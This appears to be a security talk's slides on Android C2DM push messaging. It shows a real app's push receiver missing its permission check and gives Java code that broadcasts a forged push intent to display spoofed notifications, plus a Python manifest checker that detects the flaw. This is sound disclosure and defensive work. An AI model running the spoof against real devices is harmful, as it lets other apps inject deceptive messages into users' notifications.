AC2DM
for Security
Android C2DM Overview
• Push notification for Android
• Rides on Gtalk (XMPP)
• Messages limited to 1024 bytes
• Account limited to 200,000 messages per day
A confusing process
Image taken from http://developer.cisco.com/web/cius-developer/blogroll/-/blogs/android-s-c2dm
Client Registration
App Registration
Message Send
Parts of a Message
Required
• Registration ID – sent by client
• Collapse key – used to avoid flooding
• Auth token – header from client login auth
Optional
• Data - payload
• Delay while idle - flag
Manifest Components
<permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE"
    android:protectionLevel="signature" />
<!-- Required to receive C2D messages -->
<uses-permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE" />
<!-- Required to register and receive registration results -->
<uses-permission android:name="com.google.android.c2dm.permission.RECEIVE" />
<!-- Internet required -->
<uses-permission android:name="android.permission.INTERNET" />
<application>
    <!-- Android C2DM registration receiver -->
    <receiver android:name=".c2dRegReceiver" android:permission="com.google.android.c2dm.permission.SEND" >
        <intent-filter >
            <action android:name="com.google.android.c2dm.intent.REGISTRATION" ></action>
            <category android:name="com.intrepidusgroup.c2dm" />
        </intent-filter>
    </receiver>
    <!-- Android C2DM message receiver -->
    <receiver android:name=".c2dMsgReceiver" android:permission="com.google.android.c2dm.permission.SEND" >
        <intent-filter >
            <action android:name="com.google.android.c2dm.intent.RECEIVE" ></action>
            <category android:name="com.intrepidusgroup.c2dm" />
        </intent-filter>
    </receiver>
</application>
Real World
<permission
android:name="com.app.mobile.permission.C2D_MESSAGE"
android:protectionLevel="signature" />
<uses-permission
android:name="com.app.mobile.permission.C2D_MESSAGE" />
So far so good…
Real World
<receiver android:name=".notifications.PushMsgReceiver"
android:process=":notifications">
<intent-filter>
<action
android:name="com.google.android.c2dm.intent.RECEIVE" />
<category android:name="com.ebay.mobile" />
</intent-filter>
<intent-filter>
<action
android:name="com.google.android.c2dm.intent.REGISTRATION" />
<category android:name="com.ebay.mobile" />
</intent-filter>
</receiver>
<!-- Only C2DM servers can send messages for the app.
If permission is not set - any other app can generate it -->
<receiver android:name=".C2DMReceiver"
android:permission="com.google.android.c2dm.permission.SEND">
So…
ZOMG!!
Example Push (seen in logcat)
I/PushService( 3990): onHandleIntent:
action=3, intent data=Bundle[{
itm=37524594341,
push_action=3,
title=message received from: jross,
collapse_key=jrossig01,
sound=m2mmsghdr.caf,
evt=M2MMSGHDR,
from=appid@gmail.com,
usr=jross
}]
Spoof (no cloud required)
// declare the Intent
final Intent sendC2DM = new Intent
("com.google.android.c2dm.intent.RECEIVE");
// set this as category com.app.mobile to match the intent-filter
sendC2DM.addCategory("com.app.mobile");
// add the expected data elements
sendC2DM.putExtra("itm", "37524594341");
sendC2DM.putExtra("push_action", "3");
sendC2DM.putExtra("title", "message recieved from: C2DSpoofer");
sendC2DM.putExtra("sound", "m2mmsghdr.caf");
sendC2DM.putExtra("evt", "M2MMSGHDR");
sendC2DM.putExtra("usr", send2usr);
String collapse_key = randString.genString(rng, chars, 4);
sendC2DM.putExtra("collapse_key", collapse_key);
// send the message to the on-device push notification receiver
sendBroadcast(sendC2DM);
What Happened?
• App received a “C2D” message from another application installed on the device.
• Because the permission wasn’t set correctly, it accepted the message as though it came from Google.
• App displayed message notification, with the “malicious” payload intact.
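A static check for the misconfiguration described above, as an added example that is not part of the original slides: it flags any receiver that handles the C2DM RECEIVE or REGISTRATION actions without requiring com.google.android.c2dm.permission.SEND, and any C2D_MESSAGE permission that is not signature-protected. It assumes the manifest has already been decoded to text XML; the function name, issue labels and sample manifests are constructed for illustration from the snippets on the slides.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
C2DM_SEND = "com.google.android.c2dm.permission.SEND"
C2DM_ACTIONS = {
    "com.google.android.c2dm.intent.RECEIVE",
    "com.google.android.c2dm.intent.REGISTRATION",
}


def _android(elem, name):
    """Read an android:-namespaced attribute, or None if it is absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def audit_manifest(manifest_xml):
    """Return (component, issue) tuples for C2DM misconfigurations (hypothetical labels)."""
    root = ET.fromstring(manifest_xml)
    findings = []

    # The app's own C2D_MESSAGE permission must be signature-protected,
    # otherwise another app can simply request it.
    for perm in root.findall("permission"):
        name = _android(perm, "name") or ""
        if (name.endswith(".permission.C2D_MESSAGE")
                and _android(perm, "protectionLevel") != "signature"):
            findings.append((name, "permission-not-signature"))

    # Every receiver that handles a C2DM action must require the SEND
    # permission from the broadcaster. android:permission on <application>
    # is the default for components that do not set their own.
    for app in root.findall("application"):
        app_perm = _android(app, "permission")
        for receiver in app.findall("receiver"):
            actions = {_android(a, "name") for a in receiver.iter("action")}
            handled = actions & C2DM_ACTIONS
            if not handled:
                continue
            effective = _android(receiver, "permission") or app_perm
            if effective != C2DM_SEND:
                for action in sorted(handled):
                    findings.append((_android(receiver, "name"),
                                     "unprotected:" + action.rsplit(".", 1)[1]))
    return findings


# Constructed sample: the "Real World" receiver, with no android:permission.
VULNERABLE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.app.mobile">
  <permission android:name="com.app.mobile.permission.C2D_MESSAGE"
      android:protectionLevel="signature" />
  <application>
    <receiver android:name=".notifications.PushMsgReceiver"
        android:process=":notifications">
      <intent-filter>
        <action android:name="com.google.android.c2dm.intent.RECEIVE" />
        <category android:name="com.app.mobile" />
      </intent-filter>
      <intent-filter>
        <action android:name="com.google.android.c2dm.intent.REGISTRATION" />
        <category android:name="com.app.mobile" />
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed sample: the same receiver with the SEND permission required.
HARDENED = VULNERABLE.replace(
    'android:process=":notifications"',
    'android:process=":notifications" android:permission="%s"' % C2DM_SEND)

if __name__ == "__main__":
    for label, xml in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(label, audit_manifest(xml))
```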
Other Things We’ve Noticed
• Messages that come in may not be accurately received by the activity they are sent to (see: demo).
• If you have multiple devices, or multiple users on a single device, things may get tricky.
Questions?
Contact:
jason.ross@intrepidusgroup.com

Editor's Notes

  1. Message parameters:
     • registration_id = The registration ID retrieved from the Android application on the phone. Required.
     • collapse_key = An arbitrary string that is used to collapse a group of like messages when the device is offline, so that only the last message gets sent to the client. This is intended to avoid sending too many messages to the phone when it comes back online. Note that since there is no guarantee of the order in which messages get sent, the "last" message may not actually be the last message sent by the application server. Required.
     • data.<key> = Payload data, expressed as key-value pairs. If present, it will be included in the Intent as application data, with the <key>. There is no limit on the number of key/value pairs, though there is a limit on the total size of the message. Optional.
     • delay_while_idle = If included, indicates that the message should not be sent immediately if the device is idle. The server will wait for the device to become active, and then only the last message for each collapse_key value will be sent. Optional.
     • Authorization: GoogleLogin auth=[AUTH_TOKEN] = Header with a ClientLogin Auth token. The cookie must be associated with the ac2dm service. Required.
  2. This requires the application signature to be present when the permission is used. This restricts the C2D messages such that they must be sourced from Google in order for the application to process them. If the "android:permission" portion is missing, anyone can push messages of this type (Registration results) to the application. Same as #2, but for the actual C2D messages.